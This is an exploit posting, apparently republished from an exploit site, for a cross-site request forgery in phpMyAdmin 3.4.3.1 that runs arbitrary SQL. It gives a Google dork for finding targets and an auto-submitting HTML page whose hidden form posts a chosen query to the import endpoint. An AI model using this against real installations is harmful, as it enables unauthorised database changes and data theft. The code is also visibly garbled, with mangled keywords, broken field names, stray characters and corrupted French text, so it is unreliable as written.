# Exploit Title: PhpMyadmin XSRF Vuln (Execute SQL Query)
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia [at] hotmail.com | Caddy-Dz [at] exploit-id.com
# Website: www.exploit-id.com
# Google Dork: inurl:/phpmyadmin/
# Category: Webapps
# Tested on: [Windows Seven Edition Int é gral-French]
####
# |> ------- ++ = [Dz Offenders Cr3w] ==+++ ----- <|
# | Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |
# | Jago-dz * Over-X * Kha & miX * Ev! LsCr! PT_Dz *... |
# | --------------------------------------------- |
# + All Dz .. This is Open Group 4 L33T Dz Hax3rZ ..
####
[+] Note:
Only the request executed by the root, users (Server)
[+] Tested on: EasyPhp 5.4alpha2
-Apache 2.2.19
-MySQL 5.5.13
-PhpMyAdmin 3.4.3.1
-Xdebug 2.1.1
[+] Video:
Http://www.youtube.com/watch? V = xJH_ujBNTVY
[*] ExpLo! T:
<Html>
<Head>
</Head>
<Body onload = "javascript: fireForms ()">
<Script language = "JavaScript">
Function fireForms ()
{
Var count = 1;
Var I = 0;
For (I = 0; I <count; I ++)
{
Document. forms [I]. submit ();
}
}
</Script>
<Form method = "post" action = "http://www.bkjia.com/home/mysql/import. php "enctype =" multipart/form-data "class =" ajax "id =" sqlqueryform "name =" sqlform ">
<Input type = "hidden" name = "is_js_confirmed" value = "0"/>
<Input type = "hidden" name = "token" value = "47cd4b47756bd497165c6fc7f87d2182"/> <= make sure you put the right value
<Input type = "hidden" name = "pos" value = "0"/>
<Input type = "hidden" name = "goto" value = "server_ SQL .php"/>
<Input type = "hidden" name = "message_to_show" value = "Votre requ unique te SQL a é té ex é cut é e avec succ è s"/>
<Input type = "hidden" name = "prev_ SQL _query" value = ""/>
<Textarea type = "hidden" tabindex = "100" name = "SQL _query" id = "sqlquery" cols = "40" rows = "30" dir = "ltr"> Your SQL query; </textarea>
<Input type = "hidden" name = "bkm_label" value = ""/>
<Input type = "hidden" name = "bkm_all_users" value = "true"/>
<Input type = "hidden" name = "bkm_replace" value = "true"/>
<Input type = "hidden" name = "SQL _delimiter" value = ";"/>]
<Input type = "hidden" name = "show_query" value = "1" checked = "checked"/>
</Form>
####
[+] Peace From Algeria